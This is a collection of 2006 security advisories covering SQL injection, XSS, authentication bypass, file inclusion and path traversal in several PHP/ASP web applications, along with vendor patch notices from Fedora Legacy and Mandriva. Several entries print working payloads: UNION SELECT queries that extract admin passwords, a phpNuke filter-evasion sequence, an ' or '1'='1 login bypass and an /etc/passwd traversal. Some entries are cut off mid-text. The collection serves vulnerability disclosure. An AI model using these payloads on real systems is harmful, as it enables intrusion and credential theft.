SQL Injection in DCI-Taskeen
Hello Vulnerable: DCI-Taskeen v1.03 http://www.dci-designs.com Exploit : http://example.com/basket.php?action=addex&id=[SQL] http://example.com/basket.php?action=[SQL] http://example.com/basket.php?action=addr&id=[SQL] http://example.com/cat.php?do=cat&page=1&id=[SQL] http://example/cat.php?do=cat&page=[SQL] Discovery by Linux_Drox http://www.lezr.com Best Regards
PwsPHP Injection SQL on Index.php
Summary Software: Pwsphp CMS Sowtware's Web Site: http://www.pwsphp.com/ Versions: ALL Type: Injection SQL Class: Remote Status: Unpatched. No reply from developer(s) Exploit: Available Solution: Not Available Discovered by: papipsycho SITE : (papipsycho.com & WOrlddefacers.de) -Description--- Vulnerable Script: index.php to connect has you your account exec exploit edit your cookie to change the pass and the login, to reload & enjoy --Exploit-- http://example.com/index.php?mod=sondages&do=results&id=1%20union%20select%20id,0,0,pseudo,pass,pseudo,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20%60users%60%20/* --Solution- No Patch available. --Credit--- Discovered by: papipsycho SITE : (papipsycho.com & WOrlddefacers.de)
[waraxe-2006-SA#047] - Evading sql-injection filters in phpNuke 7.8
{}
{ [waraxe-2006-SA#047]
}
{}
{
}
{[ Evading sql-injection filters in phpNuke 7.8 ]
}
{
}
{}
Author: Janek Vind "waraxe"
Date: 25. February 2006
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-47.html
Target software description:
phpNuke 7.8
Homepage: http://phpnuke.org/
What is phpNuke ?
PHP-Nuke is a news automated system specially designed to be used in Intranets
and
Internet. The Administrator has total control of his web site, registered
users, and
he will have in the hand a powerful assembly of tools to maintain an active and
100%
interactive web site using databases.
Vulnerabilities:
phpNuke is known to be exploitable by many sql injection variations. This is
due to
very poor coding quality and no-security-in-mind-at-all programming style.
And instead of rewriting phpNuke from scratch, there are many filters, patches,
code
improvements and so on, directed to "curing" specific security holes. This
particular
advisory will address weaknesses in anti-sql-injection filters, used in phpNuke
7.8
version.
Details
So, what can we see in "mainfile.php", line ~20:
[ from source code ]--
//Union Tap
//Copyright Zhen-Xjell 2004 http://nukecops.com
//Beta 3 Code to prevent UNION SQL Injections
unset($matches);
unset($loc);
if (preg_match("/([OdWo5NIbpuU4V2iJT0n]{5}) /",
rawurldecode($loc=$_SERVER["QUERY_STRING"]), $matches)) {
die();
}
$queryString = strtolower($_SERVER['QUERY_STRING']);
if (stripos_clone($queryString,'%20union%20') OR
stripos_clone($queryString,'/*')
OR stripos_clone($queryString,'*/union/*') OR
stripos_clone($queryString,'c2nyaxb0')) {
header("Location: index.php");
die();
}
[ /from source code ]-
Two different filters can be spotted, one of them will stop script execution,
second
one redirects to index page.
So let's start with experimenting part.
Test #1:
http://localhost/nuke78/?kala=p0hh%20UNION%20ALL%20SELECT%201,2,3,4,5%20FROM%20nuke_authors/*
... and we get caught by first filter (because we get only blank page).
Ok, let' modify our attack string.
Test #2:
http://localhost/nuke78/?kala=p0hh+UNION+ALL+SELECT+1,2,3,pwd,5+FROM+nuke_authors/*
... And second filter is about kicking our a$$ (we got redirected to index).
Hmmm, how about this one ...
Test #3":
http://localhost/nuke78/?kala=p0hh+UNION+ALL+SELECT+1,2,3,pwd,5+FROM+nuke_authors/%2a
Yeah - we got through :)
And now let's be honest against nuke patches releasers and let's try this
working
string against PATCHED phpNuke 7.8.
Details:
patch file - "78patched3dot2.zip"
version 3.2
Download URL -
http://www.nukeresources.com/downloadview-details-1037-Nuke_7.8_Patched.html
Test#4:
http://localhost/nuke78p/?kala=p0hh+UNION+ALL+SELECT+1,2,3,pwd,5+FROM+nuke_authors/%2a
and WE GET CAUGHT with message "Illegal Operation" ...
Oh my ...
What we can see in patched "mainfile.php":
[ from source code ]--
// Additional security (Union, CLike, XSS)
if(!file_exists('includes/nukesentinel.php')) {
//Union Tap
//Copyright Zhen-Xjell 2004 http://nukecops.com
//Beta 3 Code to prevent UNION SQL Injections
unset($matches);
unset($loc);
if(isset($_SERVER['QUERY_STRING'])) {
if (preg_match("/([OdWo5NIbpuU4V2iJT0n]{5}) /",
rawurldecode($loc=$_SERVER['QUERY_STRING']), $matches)) {
die('Illegal Operation');
}
}
if((!is_admin($admin)) AND (isset($_SERVER['QUERY_STRING']))
AND (!stristr($_SERVER['QUERY_STRING'], "ad_click"))) {
$queryString = $_SERVER['QUERY_STRING'];
if ((stristr($queryString,'%20union%20')) OR (stristr($queryString,'/*'))
OR (stristr($queryString,'*/union/*')) OR (stristr($queryString,'c2nyaxb0')) OR
(stristr($queryString,'+union+')) OR (stristr($queryString,'http://')) OR
((stristr($queryString,'cmd=')) AND (!stristr($queryString,'&cmd'))) OR
((stristr($queryString,'exec')) AND (!stristr($queryString,'execu'))) OR
(stristr($queryString,'concat'))) {
die('Illegal Operation');
}
}
}[ /from source code ]-
This code seems very restrictive, but ... wait a minute ...
"AND (!stristr($_SERVER['QUERY_STRING']
ArGoSoft FTP server remote heap overflow
-- Title: ArGoSoft FTP server remote heap overflow -- Affected Products: ArGoSoft FTP server 1.4.3.5 (current) and prior -- Affected Vendor: ArGoSoft - http://www.argosoft.com -- Impact: DoS, Arbitrary Code Execution -- Where: >From remote -- Type: Heap Overflow -- Vulnerability Details: A remote attacker with valid credentials is able to trigger a heap overwrite in ArgoSoft FTP server. The bug occurs by providing a long argument to the DELE command. This vulnerability can allow remote attackers to execute arbitrary code or launch a denial of service attack. -- Credit: SecurInfos https://www.securinfos.info/english/
[FLSA-2006:176731] Updated perl packages fix security issue
- Fedora Legacy Update Advisory Synopsis: Updated perl packages fix security issue Advisory ID: FLSA:176731 Issue date:2006-02-25 Product: Red Hat Linux, Fedora Core Keywords: Bugfix CVE Names: CVE-2005-3962 - - 1. Topic: Updated perl packages that fix a security flaw are now available. Perl is a high-level programming language commonly used for system administration utilities and Web programming. 2. Relevant releases/architectures: Red Hat Linux 9 - i386 Fedora Core 1 - i386 Fedora Core 2 - i386 3. Problem description: An integer overflow bug was found in Perl's format string processor. It is possible for an attacker to cause perl to crash or execute arbitrary code if the attacker is able to process a malicious format string. This issue is only exploitable through a script which passes arbitrary untrusted strings to the format string processor. The Common Vulnerabilities and Exposures project assigned the name CVE-2005-3962 to this issue. Note that this vulnerability do not affect perl packages in Red Hat Linux 7.3 Users of perl are advised to upgrade to these packages which contain a backported patch and are not vulnerable to this issue. 4. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. To update all RPMs for your particular architecture, run: rpm -Fvh [filenames] where [filenames] is a list of the RPMs you wish to upgrade. Only those RPMs which are currently installed will be updated. Those RPMs which are not installed but included in the list will not be updated. Note that you can also use wildcards (*.rpm) if your current directory *only* contains the desired RPMs. Please note that this update is also available via yum and apt. Many people find this an easier way to apply updates. To use yum issue: yum update or to use apt: apt-get update; apt-get upgrade This will start an interactive process that will result in the appropriate RPMs being upgraded on your system. This assumes that you have yum or apt-get configured for obtaining Fedora Legacy content. Please visit http://www.fedoralegacy.org/docs for directions on how to configure yum and apt-get. 5. Bug IDs fixed: https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=176731 6. RPMs required: Red Hat Linux 9: SRPM: http://download.fedoralegacy.org/redhat/9/updates/SRPMS/perl-5.8.0-90.0.13.legacy.src.rpm i386: http://download.fedoralegacy.org/redhat/9/updates/i386/perl-5.8.0-90.0.13.legacy.i386.rpm http://download.fedoralegacy.org/redhat/9/updates/i386/perl-CGI-2.81-90.0.13.legacy.i386.rpm http://download.fedoralegacy.org/redhat/9/updates/i386/perl-CPAN-1.61-90.0.13.legacy.i386.rpm http://download.fedoralegacy.org/redhat/9/updates/i386/perl-DB_File-1.804-90.0.13.legacy.i386.rpm http://download.fedoralegacy.org/redhat/9/updates/i386/perl-suidperl-5.8.0-90.0.13.legacy.i386.rpm Fedora Core 1: SRPM: http://download.fedoralegacy.org/fedora/1/updates/SRPMS/perl-5.8.3-17.5.legacy.src.rpm i386: http://download.fedoralegacy.org/fedora/1/updates/i386/perl-5.8.3-17.5.legacy.i386.rpm http://download.fedoralegacy.org/fedora/1/updates/i386/perl-suidperl-5.8.3-17.5.legacy.i386.rpm Fedora Core 2: SRPM: http://download.fedoralegacy.org/fedora/2/updates/SRPMS/perl-5.8.3-19.5.legacy.src.rpm i386: http://download.fedoralegacy.org/fedora/2/updates/i386/perl-5.8.3-19.5.legacy.i386.rpm http://download.fedoralegacy.org/fedora/2/updates/i386/perl-suidperl-5.8.3-19.5.legacy.i386.rpm 7. Verification: SHA1 sum Package Name - 4d2401a09f2cc0b126df88659bd9e259a528146d redhat/9/updates/i386/perl-5.8.0-90.0.13.legacy.i386.rpm 3b5448a2a8d8241a85c4c54ad5d5deb4b9d466d4 redhat/9/updates/i386/perl-CGI-2.81-90.0.13.legacy.i386.rpm 40a05fcf3a7d128e7fa79b00022d54d0542bd3af redhat/9/updates/i386/perl-CPAN-1.61-90.0.13.legacy.i386.rpm 5444ce68de7e8f0b1b051a15a1658c7d497be61b redhat/9/updates/i386/perl-DB_File-1.804-90.0.13.legacy.i386.rpm 76ff3cdbe78a2e7c92c1f95760906fd396f974bf redhat/9/updates/i386/perl-suidperl-5.8.0-90.0.13.legacy.i386.rpm 62fbcae6dd839fd18aabcf5c9fcc6babfd844d94 redhat/9/updates/SRPMS/perl-5.8.0-90.0.13.legacy.src.rpm 3267a9d83ac3cadcfa650b1625cf5c458adb5540 fedora/1/updates/i386/perl-5.8.3-17.5.legacy.i386.rpm 2445d66c7ced8bccc7d875a21404216a0cd5cdb6 fedora/1/updates/i386/perl-suidperl-5.8.3-17.5.legacy.i386.rpm 297a649694e03e67b13cfbac7ae8211554cea44b fedora/1/updates/SRPMS/perl-5.8.3-17.5.legacy.src.rpm 772f9571df3a0eab7749bb0d162311f4cd539879 fedora/2/updates/i386/perl-5.8.3-19.5.legacy.i386.rpm 83cf2b36b48760eb1f99a042214eead7a9650d38 fedora/2/updates/i386/perl-suidperl-5.8.3-19.5.le
[FLSA-2006:158543] Updated gaim package fixes security issues
- Fedora Legacy Update Advisory Synopsis: Updated gaim package fixes security issues Advisory ID: FLSA:158543 Issue date:2006-02-25 Products: Red Hat Linux, Fedora Core Keywords: Bugfix CVE Names: CVE-2005-0208 CVE-2005-0473 CVE-2005-0472 CVE-2005-0965 CVE-2005-0966 CVE-2005-0967 CVE-2005-1261 CVE-2005-1262 CVE-2005-2103 CVE-2005-2102 CVE-2005-2370 CVE-2005-1269 CVE-2005-1934 - - 1. Topic: An updated gaim package that fixes various security issues as well as a number of bugs is now available. The Gaim application is a multi-protocol instant messaging client. 2. Relevant releases/architectures: Red Hat Linux 7.3 - i386 Red Hat Linux 9 - i386 Fedora Core 1 - i386 Fedora Core 2 - i386 3. Problem description: Two HTML parsing bugs were discovered in Gaim. It is possible that a remote attacker could send a specially crafted message to a Gaim client, causing it to crash. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2005-0208 and CVE-2005-0473 to these issues. A bug in the way Gaim processes SNAC packets was discovered. It is possible that a remote attacker could send a specially crafted SNAC packet to a Gaim client, causing the client to stop responding. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2005-0472 to this issue. A buffer overflow bug was found in the way gaim escapes HTML. It is possible that a remote attacker could send a specially crafted message to a Gaim client, causing it to crash. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2005-0965 to this issue. A bug was found in several of gaim's IRC processing functions. These functions fail to properly remove various markup tags within an IRC message. It is possible that a remote attacker could send a specially crafted message to a Gaim client connected to an IRC server, causing it to crash. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2005-0966 to this issue. A bug was found in gaim's Jabber message parser. It is possible for a remote Jabber user to send a specially crafted message to a Gaim client, causing it to crash. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2005-0967 to this issue. A stack based buffer overflow bug was found in the way gaim processes a message containing a URL. A remote attacker could send a carefully crafted message resulting in the execution of arbitrary code on a victim's machine. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2005-1261 to this issue. A bug was found in the way gaim handles malformed MSN messages. A remote attacker could send a carefully crafted MSN message causing gaim to crash. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2005-1262 to this issue. A heap based buffer overflow issue was discovered in the way Gaim processes away messages. A remote attacker could send a specially crafted away message to a Gaim user logged into AIM or ICQ that could result in arbitrary code execution. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2005-2103 to this issue. Daniel Atallah discovered a denial of service issue in Gaim. A remote attacker could attempt to upload a file with a specially crafted name to a user logged into AIM or ICQ, causing Gaim to crash. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2005-2102 to this issue. A denial of service bug was found in Gaim's Gadu Gadu protocol handler. A remote attacker could send a specially crafted message to a Gaim user logged into Gadu Gadu, causing Gaim to crash. Please note that this issue only affects PPC and IBM S/390 systems running Gaim. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2005-2370 to this issue. Jacopo Ottaviani discovered a bug in the way Gaim handles Yahoo! Messenger file transfers. It is possible for a malicious user to send a specially crafted file transfer request that causes Gaim to crash. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2005-1269 to this issue. Additionally, Hugo de Bokkenrijder discovered a bug in the way Gaim parses MSN Messenger messages. It is possible for a malicious user to send a specially crafted MSN Messenger message that causes Gaim to crash. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2005-1934 to this issue. Additionally, various client crashes, m
[FLSA-2006:138098] Updated nfs-utils package fixes security issues
- Fedora Legacy Update Advisory Synopsis: Updated nfs-utils package fixes security issues Advisory ID: FLSA:138098 Issue date:2006-02-25 Product: Red Hat Linux, Fedora Core Keywords: Bugfix CVE Names: CVE-2004-0946 CVE-2004-1014 - - 1. Topic: An updated nfs-utils package that fixes security issues is now available. The nfs-utils package provides a daemon for the kernel NFS server and related tools, providing a much higher level of performance than the traditional Linux NFS server used by most users. 2. Relevant releases/architectures: Red Hat Linux 7.3 - i386 Red Hat Linux 9 - i386 Fedora Core 1 - i386 Fedora Core 2 - i386 3. Problem description: Arjan van de Ven discovered a buffer overflow in rquotad. On 64-bit architectures, an improper integer conversion can lead to a buffer overflow. An attacker with access to an NFS share could send a specially crafted request which could lead to the execution of arbitrary code. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2004-0946 to this issue. In addition, the Fedora Core 2 update fixes the following issue: SGI reported that the statd daemon did not properly handle the SIGPIPE signal. A misconfigured or malicious peer could cause statd to crash, leading to a denial of service. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2004-1014 to this issue. All users of nfs-utils should upgrade to this updated package, which resolves these issues. 4. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. To update all RPMs for your particular architecture, run: rpm -Fvh [filenames] where [filenames] is a list of the RPMs you wish to upgrade. Only those RPMs which are currently installed will be updated. Those RPMs which are not installed but included in the list will not be updated. Note that you can also use wildcards (*.rpm) if your current directory *only* contains the desired RPMs. Please note that this update is also available via yum and apt. Many people find this an easier way to apply updates. To use yum issue: yum update or to use apt: apt-get update; apt-get upgrade This will start an interactive process that will result in the appropriate RPMs being upgraded on your system. This assumes that you have yum or apt-get configured for obtaining Fedora Legacy content. Please visit http://www.fedoralegacy.org/docs for directions on how to configure yum and apt-get. 5. Bug IDs fixed: https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=138098 6. RPMs required: Red Hat Linux 7.3: SRPM: http://download.fedoralegacy.org/redhat/7.3/updates/SRPMS/nfs-utils-0.3.3-6.73.2.legacy.src.rpm i386: http://download.fedoralegacy.org/redhat/7.3/updates/i386/nfs-utils-0.3.3-6.73.2.legacy.i386.rpm Red Hat Linux 9: SRPM: http://download.fedoralegacy.org/redhat/9/updates/SRPMS/nfs-utils-1.0.1-3.9.2.legacy.src.rpm i386: http://download.fedoralegacy.org/redhat/9/updates/i386/nfs-utils-1.0.1-3.9.2.legacy.i386.rpm Fedora Core 1: SRPM: http://download.fedoralegacy.org/fedora/1/updates/SRPMS/nfs-utils-1.0.6-1.2.legacy.src.rpm i386: http://download.fedoralegacy.org/fedora/1/updates/i386/nfs-utils-1.0.6-1.2.legacy.i386.rpm Fedora Core 2: SRPM: http://download.fedoralegacy.org/fedora/2/updates/SRPMS/nfs-utils-1.0.6-22.2.legacy.src.rpm i386: http://download.fedoralegacy.org/fedora/2/updates/i386/nfs-utils-1.0.6-22.2.legacy.i386.rpm 7. Verification: SHA1 sum Package Name - fc563f70e9f2b5eeafb51b969689185ef504 redhat/7.3/updates/i386/nfs-utils-0.3.3-6.73.2.legacy.i386.rpm 79dd718df766c23fc8ab4880a0e1557ca990c181 redhat/7.3/updates/SRPMS/nfs-utils-0.3.3-6.73.2.legacy.src.rpm 45c4f3a310d3090271f0d0798cae1e3148ab8299 redhat/9/updates/i386/nfs-utils-1.0.1-3.9.2.legacy.i386.rpm bf009c4fe075b7105316084c6ca577f15c5bdb52 redhat/9/updates/SRPMS/nfs-utils-1.0.1-3.9.2.legacy.src.rpm 1c96ae93420683ad79b675b205ecb5d6ddb61ef4 fedora/1/updates/i386/nfs-utils-1.0.6-1.2.legacy.i386.rpm 6d4ee9e13e8b3bf1278d59b48ccb0c48f7645f7f fedora/1/updates/SRPMS/nfs-utils-1.0.6-1.2.legacy.src.rpm 2063735e17273d7967c8fa1f3649ab86921c910e fedora/2/updates/i386/nfs-utils-1.0.6-22.2.legacy.i386.rpm dc3207c089204dd1c47653dc4918fe45b81a8654 fedora/2/updates/SRPMS/nfs-utils-1.0.6-22.2.legacy.src.rpm These packages are GPG signed by Fedora Legacy for security. Our key is available from http://www.fedoralegacy.org/about/security.php You can verify each package with the following command: rpm --checksig -v If you only wish to verify that each package has not been corr
NSA Group Security Advisory NSAG-№202-25.02.2006 Vulnerability WEBSITE GENERATOR 3.3
Advisory: NSAG-№202-25.02.2006 Research: NSA Group [Russian company on Audit of safety & Network security] Site of Research: http://www.nsag.ru or http://www.nsag.org Product: WEBSITE GENERATOR 3.3 Site of manufacturer: http://freehostshop.com The status: 19/11/2005 - Publication is postponed. 19/11/2005 - Manufacturer is not notified (there is no communication). 17/02/2006 - Publication of vulnerability. Original Advisory: http://www.nsag.ru/vuln/894.html Risk: Hide Description: The removed user, can upload php script from other server and execute custom php code on webserver. Exploit: Method GET: http://example.com/files/myforms/process3.php?formname=attack.php%00*name[0]= Link: http://example.com/files/myforms/forms/attack.php More information: http://www.nsag.ru/vuln/894.html ++ www.nsag.ru «Nemesis» © 2006 Nemesis Security Audit Group © 2006.
Advisory: eZ publish <= 3.7.3 (imagecatalogue module) XSS vulnerability
--Security Report--
Advisory: eZ publish <= 3.7.3 (imagecatalogue module) XSS vulnerability
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 25/02/06 01:43 PM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx (at) nukedx (dot) com
Web: http://www.nukedx.com
}
---
Vendor: eZ systems (http://www.ez.no)
Version: 3.7.3 and must be prior versions.
About: Via this method remote attacker can make malicious links for clicking and
when victim clicks this links victim's browser would be inject with XSS.
Level: Harmless
---
How&Example:
?ReferrerURL variable did not sanitized properly.
GET -> http://[site]/[ezdir]/imagecatalogue/imageview/475/?RefererURL=";>[XSS]
EXAMPLE ->
http://[site]/[ezdir]/imagecatalogue/imageview/475/?RefererURL=";>alert('X');http://www.nukedx.com/?viewdoc=16
Advisory: Pentacle In-Out Board <= 6.03 (newsdetailsview.asp newsid) Remote SQL Injection Vulnerability
--Security Report--
Advisory: Pentacle In-Out Board <= 6.03 (newsdetailsview.asp newsid) Remote SQL
Injection Vulnerability
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 25/02/06 06:08 AM
---
Contacts:{
ICQ: 10072
MSN/Email: [EMAIL PROTECTED]
Web: http://www.nukedx.com
}
---
Vendor: G2SOFT (www.g2soft.net)
Version: 6.03 and prior versions must be affected.
About: Via this method remote attacker can inject arbitrary SQL query to
newsdetailsview.asp.
Level: Critical
---
How&Example:
GET -> http://[site]/[ptdir]/newsdetailsview.asp?newsid=11%20[SQLCode]
EXAMPLE ->
http://[site]/[ptdir]/newsdetailsview.asp?newsid=11%20union%20select%200,userpassword,0,username,0,0,0,0
%20from%20pt_users%20where%20userid=1%20and%20useradmin=yes
With this example remote attacker could get admin's username and password.
--
Timeline:
* 25/02/2006: Vulnerability found.
* 25/02/2006: Contacted with vendor and waiting reply.
--
Exploit:
http://www.nukedx.com/?getxpl=14
--
Original advisory: http://www.nukedx.com/?viewdoc=14
Advisory: Pentacle In-Out Board <= 6.03 (login.asp) Authencation ByPass Vulnerability
--Security Report--
Advisory: Pentacle In-Out Board <= 6.03 (login.asp) Authencation ByPass
Vulnerability
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 25/02/06 05:56 AM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx (at) nukedx (dot) com
Web: http://www.nukedx.com
}
---
Vendor: G2SOFT (www.g2soft.net)
Version: 6.03 and prior versions must be affected.
About: Via this method remote attacker can bypass login.asp and login as admin.
Level: Critical
---
How:
SQL query in line 31 of login.asp which is checking username and password did
not sanitized properly.
POST -> http://[site]/[ptdir]/login.asp?username=any&password=' or '1'='1
--
Timeline:
* 25/02/2006: Vulnerability found.
* 25/02/2006: Contacted with vendor and waiting reply.
--
Exploit:
http://www.nukedx.com/?getxpl=13
--
Original advisory: http://www.nukedx.com/?viewdoc=13
NSA Group Security Advisory NSAG-№201-25.02.2006 Vulnerability SPiD v1 .3.1
Advisory:
NSAG-№201-25.02.2006
Research:
NSA Group [Russian company on Audit of safety & Network security]
Site of Research:
http://www.nsag.ru or http://www.nsag.org
Product:
SPiD v1.3.1
Site of manufacturer:
http://spid.adnx.net/
The status:
19/01/2006 - Publication is postponed.
14/02/2006 - Answer of the manufacturer is absent.
25/02/2006 - Publication of vulnerability.
Original Advisory:
http://www.nsag.ru/vuln/955.html
Risk:
Hide
Description:
Attacker can form the query in URL form ang get the access to the
system files.
Vulnerability code:
+++
if (isset($_REQUEST["lang"])) {
$file_lang = $lang_path . "lang_" . $_REQUEST["lang"] . ".php"
if (file_exists($file_lang)){
include $lang_path . "lang.php";
include $file_lang;
.
skip
+++
Exploit:
http://example.com/spiddir/scan_lang_insert.php?lang=../../../../../../../../etc/passwd%00
More information:
http://www.nsag.ru/vuln/955.html
++
www.nsag.ru
«Nemesis» © 2006
Nemesis Security Audit Group © 2006.
[ MDKSA-2005:048 ] - Updated mplayer packages fix integer overflow vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2005:048 http://www.mandriva.com/security/ ___ Package : mplayer Date: February 24, 2005 Affected: 2006.0, Corporate 3.0 ___ Problem Description: Multiple integer overflows in (1) the new_demux_packet function in demuxer.h and (2) the demux_asf_read_packet function in demux_asf.c in MPlayer 1.0pre7try2 and earlier allow remote attackers to execute arbitrary code via an ASF file with a large packet length value. The updated packages have been patched to prevent this problem. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0579 ___ Updated Packages: Mandriva Linux 2006.0: 6a9787d26d2b82697525ea3ce1a42528 2006.0/RPMS/libdha1.0-1.0-1.pre7.12.2.20060mdk.i586.rpm 2cee96ab48d748bd5c218c6b72762a69 2006.0/RPMS/libpostproc0-1.0-1.pre7.12.2.20060mdk.i586.rpm 7d85bd28f30c98b2c4da1fb27935 2006.0/RPMS/libpostproc0-devel-1.0-1.pre7.12.2.20060mdk.i586.rpm eeaae4efea7c733946468504c0847c6e 2006.0/RPMS/mencoder-1.0-1.pre7.12.2.20060mdk.i586.rpm a3e1114604c50095b4a00e3e2546fad4 2006.0/RPMS/mplayer-1.0-1.pre7.12.2.20060mdk.i586.rpm 7c1d40d98a7c63b84836f17742424572 2006.0/RPMS/mplayer-gui-1.0-1.pre7.12.2.20060mdk.i586.rpm 0ae9253d37d09e4e015c0dbea3e3238b 2006.0/SRPMS/mplayer-1.0-1.pre7.12.2.20060mdk.src.rpm Mandriva Linux 2006.0/X86_64: 083cd368b22c862c3ad4e3c6809373ba x86_64/2006.0/RPMS/lib64postproc0-1.0-1.pre7.12.2.20060mdk.x86_64.rpm f6764f327bc34aea319211a1ba848d46 x86_64/2006.0/RPMS/lib64postproc0-devel-1.0-1.pre7.12.2.20060mdk.x86_64.rpm 7cd2b81fe303956e07ead2be2ce40d01 x86_64/2006.0/RPMS/mencoder-1.0-1.pre7.12.2.20060mdk.x86_64.rpm 9962424187f6d7f99f91d65b22e62eea x86_64/2006.0/RPMS/mplayer-1.0-1.pre7.12.2.20060mdk.x86_64.rpm fc4d22d72852405516379f36249626ae x86_64/2006.0/RPMS/mplayer-gui-1.0-1.pre7.12.2.20060mdk.x86_64.rpm 0ae9253d37d09e4e015c0dbea3e3238b x86_64/2006.0/SRPMS/mplayer-1.0-1.pre7.12.2.20060mdk.src.rpm Corporate 3.0: 79227923f532fd0d481b6a8999a48fb6 corporate/3.0/RPMS/libdha0.1-1.0-0.pre3.14.6.C30mdk.i586.rpm 8239e565804440e9b5f33dab590825c4 corporate/3.0/RPMS/libpostproc0-1.0-0.pre3.14.6.C30mdk.i586.rpm b92ecaf616a975c840fd2d8d1640141b corporate/3.0/RPMS/libpostproc0-devel-1.0-0.pre3.14.6.C30mdk.i586.rpm 1a5c6dba5378d086e76ec1c05f5fe416 corporate/3.0/RPMS/mencoder-1.0-0.pre3.14.6.C30mdk.i586.rpm 5d264152c0c2934f45c14576e3094a9d corporate/3.0/RPMS/mplayer-1.0-0.pre3.14.6.C30mdk.i586.rpm 74c1e627dd747a52181e49502fa404b6 corporate/3.0/RPMS/mplayer-gui-1.0-0.pre3.14.6.C30mdk.i586.rpm 7ea541987b4b2285112e6c822704b797 corporate/3.0/SRPMS/mplayer-1.0-0.pre3.14.6.C30mdk.src.rpm Corporate 3.0/X86_64: 49ab3887057e1a407e85b09cea56d977 x86_64/corporate/3.0/RPMS/lib64postproc0-1.0-0.pre3.14.6.C30mdk.x86_64.rpm 3e8fdbfc03ba3bdbba4a31c52b8a6770 x86_64/corporate/3.0/RPMS/lib64postproc0-devel-1.0-0.pre3.14.6.C30mdk.x86_64.rpm 8d45d891ed90b1576acbc512f035f9bf x86_64/corporate/3.0/RPMS/mencoder-1.0-0.pre3.14.6.C30mdk.x86_64.rpm 2236312827cad9d6490340a9e7c66f6d x86_64/corporate/3.0/RPMS/mplayer-1.0-0.pre3.14.6.C30mdk.x86_64.rpm 803888f3129e969e1351ce6ce8a88d59 x86_64/corporate/3.0/RPMS/mplayer-gui-1.0-0.pre3.14.6.C30mdk.x86_64.rpm 7ea541987b4b2285112e6c822704b797 x86_64/corporate/3.0/SRPMS/mplayer-1.0-0.pre3.14.6.C30mdk.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.4 (GNU/Linux) iD8DBQFD/3SJmqjQ0CJFipgRAppdAJwMKNiyvLVH+QXkX5IOMRvGzhA8iACfawcl 4MpPnK4igEjRxRY2ODPNZdg= =LcLq -END PGP SIGNATURE-
